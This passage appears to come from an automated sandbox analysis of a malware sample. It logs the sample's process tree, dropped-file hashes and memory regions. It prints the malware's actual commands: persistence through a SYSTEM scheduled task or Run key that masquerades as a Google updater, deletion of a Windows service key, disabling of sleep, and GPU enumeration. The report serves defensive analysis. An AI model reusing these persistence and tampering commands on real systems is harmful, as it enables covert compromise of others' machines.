C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#kfqirnwiw#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe lhmcarocyjvzk2⤵
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"3⤵
- Drops file in Program Files directory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor4⤵
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe jftlneyiewlaxjvq GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqiKy9RognxgdgL26xl6pHcgBuSDH82m22H2uTx/gYzO827+5kpstbfmCCWwx/haNMZTpvRN2AWJn3nj807NkQH/uc5YsiTBf742xyjDXcUT/RYfnhcLyzybIWgXn+7JafUmbaP5sh35EaxsiGFShuRY1L5Fi1uvVZnjU0an3bePXHEXYChHiocVdekR4gVKAc85wY8WomQkvNXfo8OnI8G68t0jyGDhrkDKs7kWaJz2DMj5MokwVvSUi2Y2TsrAP/8HOYVji2aTn31s7dz3/WlCN+UmM7HFUgStV0krKswFnOvNVFJHtjMrdLvilnrbVN4TalQD/4emuEzW66JneW1mVBd6IrnBFdAaSbxamnHt0v75gn2+2heHSc2pqg9laV2⤵
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.0MB
MD50b1c9cde6b467847472545263c58791c
SHA13acaf0cefda3ab7e43c18a8eb17ec69477cc36a8
SHA256394ccb1ddb7208fb72d9f0a277c13202f9f2843652287eaa7355d83d88170f14
SHA512276f7effb5ec82d444aadcea8523916d6dcc76a63826bc24fa3f7ee2b2f5cc5d3994d7747aaa44b17c67d475dca41c90533e166d187e890a76bd144e0f8e0c02
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.0MB
MD50b1c9cde6b467847472545263c58791c
SHA13acaf0cefda3ab7e43c18a8eb17ec69477cc36a8
SHA256394ccb1ddb7208fb72d9f0a277c13202f9f2843652287eaa7355d83d88170f14
SHA512276f7effb5ec82d444aadcea8523916d6dcc76a63826bc24fa3f7ee2b2f5cc5d3994d7747aaa44b17c67d475dca41c90533e166d187e890a76bd144e0f8e0c02
-
C:\Program Files\Google\Libs\g.logFilesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5440cb38dbee06645cc8b74d51f6e5f71
SHA1d7e61da91dc4502e9ae83281b88c1e48584edb7c
SHA2568ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe
SHA5123aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD542cc9ff3509672894beabcd392a00c43
SHA1c12dc74a6c8a8e1f8f4033d31495ebb09d70e9ab
SHA256352d90b619218e7bf297219c1468e9ea487c9002e28984ec70a963088dff3579
SHA512c876de012d1b237463b2c2a4195e050c2ddbdf5725aa2553313525ecb6a4a3f0cda9a289f257b886395da6407b5173451e95df89665ae1c727c6be3753a89271
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD55b9a7ee9a9286faef39bbe9cac042fd4
SHA1cb3ef3c9e19781c45ffd9e2902e5b0ed38c0e2c3
SHA256a6d5d07c333b6a68534ebc0ee23ea49e77a67f26597e4bd5bcc8dfd216e6a348
SHA512ea14a4932134952864bd1b0ccdfd6ad45ed650a9bc52589f6d21fc4382a6237c6bbce1c016482b4a68cd609dadea234726927ba0f26e9443a6b970209281f450
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5b42c70c1dbf0d1d477ec86902db9e986
SHA11d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA2568ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA51257fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5
-
C:\Windows\system32\drivers\etc\hostsFilesize
2KB
MD5a4cd5d67933e16688a3bdc40a460e219
SHA1410208cf3e0c4ea90ff9818de7d80d6519a0aded
SHA2561b2e3823aad14c9b2042da68a89c52c5d81382d4cc1db16bcdd0a13e71aef14a
SHA51236f5effd3df63e0ea42a5328f53102ce1d38ca36da9fe326450bc488dd42c48063a738434ff4eabfd1223a55c53a8be067f6a1a76989cb52047c10a1eba2b1b5
-
memory/216-151-0x0000000000000000-mapping.dmp
-
memory/224-152-0x0000000000000000-mapping.dmp
-
memory/328-208-0x0000000000000000-mapping.dmp
-
memory/384-210-0x0000000000000000-mapping.dmp
-
memory/524-153-0x0000000000000000-mapping.dmp
-
memory/776-162-0x0000000000000000-mapping.dmp
-
memory/1204-217-0x00007FF7119C14E0-mapping.dmp
-
memory/1320-155-0x0000000000000000-mapping.dmp
-
memory/1352-219-0x0000000000000000-mapping.dmp
-
memory/1608-188-0x000002209B0C0000-0x000002209B0CA000-memory.dmpFilesize
40KB
-
memory/1608-183-0x0000000000000000-mapping.dmp
-
memory/1608-193-0x00007FFA025F0000-0x00007FFA030B1000-memory.dmpFilesize
10.8MB
-
memory/1608-192-0x000002209DF40000-0x000002209DF4A000-memory.dmpFilesize
40KB
-
memory/1608-186-0x000002209B0B0000-0x000002209B0BA000-memory.dmpFilesize
40KB
-
memory/1608-187-0x000002209DF10000-0x000002209DF2C000-memory.dmpFilesize
112KB
-
memory/1608-184-0x000002209B090000-0x000002209B0AC000-memory.dmpFilesize
112KB
-
memory/1608-185-0x00007FFA025F0000-0x00007FFA030B1000-memory.dmpFilesize
10.8MB
-
memory/1608-189-0x000002209DF50000-0x000002209DF6A000-memory.dmpFilesize
104KB
-
memory/1608-191-0x000002209DF30000-0x000002209DF36000-memory.dmpFilesize
24KB
-
memory/1608-190-0x000002209B0D0000-0x000002209B0D8000-memory.dmpFilesize
32KB
-
memory/1640-146-0x0000000000000000-mapping.dmp
-
memory/1860-213-0x0000000000000000-mapping.dmp
-
memory/1884-212-0x0000000000000000-mapping.dmp
-
memory/1996-145-0x0000000000000000-mapping.dmp
-
memory/2036-209-0x0000000000000000-mapping.dmp
-
memory/2288-164-0x0000000000000000-mapping.dmp
-
memory/2292-218-0x0000000000000000-mapping.dmp
-
memory/2548-181-0x00007FF69E7E0000-0x00007FF69F48B000-memory.dmpFilesize
12.7MB
-
memory/2548-224-0x00007FFA20630000-0x00007FFA20825000-memory.dmpFilesize
2.0MB
-
memory/2548-180-0x00007FF69E7E0000-0x00007FF69F48B000-memory.dmpFilesize
12.7MB
-
memory/2548-182-0x00007FFA20630000-0x00007FFA20825000-memory.dmpFilesize
2.0MB
-
memory/2548-223-0x00007FF69E7E0000-0x00007FF69F48B000-memory.dmpFilesize
12.7MB
-
memory/2548-173-0x00007FF69E7E0000-0x00007FF69F48B000-memory.dmpFilesize
12.7MB
-
memory/2548-174-0x00007FFA20630000-0x00007FFA20825000-memory.dmpFilesize
2.0MB
-
memory/2548-175-0x00007FF69E7E0000-0x00007FF69F48B000-memory.dmpFilesize
12.7MB
-
memory/2548-176-0x00007FF69E7E0000-0x00007FF69F48B000-memory.dmpFilesize
12.7MB
-
memory/2548-177-0x00007FF69E7E0000-0x00007FF69F48B000-memory.dmpFilesize
12.7MB
-
memory/2548-178-0x00007FF69E7E0000-0x00007FF69F48B000-memory.dmpFilesize
12.7MB
-
memory/2548-179-0x00007FF69E7E0000-0x00007FF69F48B000-memory.dmpFilesize
12.7MB
-
memory/2736-150-0x0000000000000000-mapping.dmp
-
memory/2832-170-0x0000000000000000-mapping.dmp
-
memory/3044-163-0x0000000000000000-mapping.dmp
-
memory/3216-203-0x0000000000000000-mapping.dmp
-
memory/3420-132-0x00007FF72E780000-0x00007FF72F42B000-memory.dmpFilesize
12.7MB
-
memory/3420-168-0x00007FF72E780000-0x00007FF72F42B000-memory.dmpFilesize
12.7MB
-
memory/3420-139-0x00007FFA20630000-0x00007FFA20825000-memory.dmpFilesize
2.0MB
-
memory/3420-135-0x00007FF72E780000-0x00007FF72F42B000-memory.dmpFilesize
12.7MB
-
memory/3420-133-0x00007FF72E780000-0x00007FF72F42B000-memory.dmpFilesize
12.7MB
-
memory/3420-140-0x00007FF72E780000-0x00007FF72F42B000-memory.dmpFilesize
12.7MB
-
memory/3420-138-0x00007FF72E780000-0x00007FF72F42B000-memory.dmpFilesize
12.7MB
-
memory/3420-137-0x00007FF72E780000-0x00007FF72F42B000-memory.dmpFilesize
12.7MB
-
memory/3420-136-0x00007FF72E780000-0x00007FF72F42B000-memory.dmpFilesize
12.7MB
-
memory/3420-167-0x00007FFA20630000-0x00007FFA20825000-memory.dmpFilesize
2.0MB
-
memory/3420-134-0x00007FF72E780000-0x00007FF72F42B000-memory.dmpFilesize
12.7MB
-
memory/3428-158-0x0000000000000000-mapping.dmp
-
memory/3436-157-0x00007FFA024D0000-0x00007FFA02F91000-memory.dmpFilesize
10.8MB
-
memory/3436-147-0x0000000000000000-mapping.dmp
-
memory/3436-165-0x00007FFA024D0000-0x00007FFA02F91000-memory.dmpFilesize
10.8MB
-
memory/3484-144-0x00007FFA024D0000-0x00007FFA02F91000-memory.dmpFilesize
10.8MB
-
memory/3484-143-0x00007FFA024D0000-0x00007FFA02F91000-memory.dmpFilesize
10.8MB
-
memory/3484-141-0x0000000000000000-mapping.dmp
-
memory/3484-142-0x000001B1C20B0000-0x000001B1C20D2000-memory.dmpFilesize
136KB
-
memory/3620-195-0x0000000000000000-mapping.dmp
-
memory/3656-148-0x0000000000000000-mapping.dmp
-
memory/3672-161-0x0000000000000000-mapping.dmp
-
memory/3676-159-0x0000000000000000-mapping.dmp
-
memory/3732-206-0x0000000000000000-mapping.dmp
-
memory/3848-156-0x0000000000000000-mapping.dmp
-
memory/3932-202-0x0000000000000000-mapping.dmp
-
memory/3952-201-0x0000000000000000-mapping.dmp
-
memory/4056-204-0x0000000000000000-mapping.dmp
-
memory/4104-216-0x000001A1A0EF9000-0x000001A1A0EFF000-memory.dmpFilesize
24KB
-
memory/4104-207-0x00007FFA025F0000-0x00007FFA030B1000-memory.dmpFilesize
10.8MB
-
memory/4104-215-0x00007FFA025F0000-0x00007FFA030B1000-memory.dmpFilesize
10.8MB
-
memory/4104-197-0x0000000000000000-mapping.dmp
-
memory/4308-166-0x0000000000000000-mapping.dmp
-
memory/4308-171-0x00007FFA025F0000-0x00007FFA030B1000-memory.dmpFilesize
10.8MB
-
memory/4556-194-0x0000000000000000-mapping.dmp
-
memory/4572-160-0x0000000000000000-mapping.dmp
-
memory/4644-220-0x0000000000000000-mapping.dmp
-
memory/4668-199-0x0000000000000000-mapping.dmp
-
memory/4756-205-0x0000000000000000-mapping.dmp
-
memory/4788-211-0x0000000000000000-mapping.dmp
-
memory/4924-214-0x0000000000000000-mapping.dmp
-
memory/5060-222-0x0000024F8A1D0000-0x0000024F8A1F0000-memory.dmpFilesize
128KB
-
memory/5060-221-0x00007FF7748325D0-mapping.dmp
-
memory/5060-227-0x00007FF774040000-0x00007FF774834000-memory.dmpFilesize
8.0MB
-
memory/5060-228-0x00007FF774040000-0x00007FF774834000-memory.dmpFilesize
8.0MB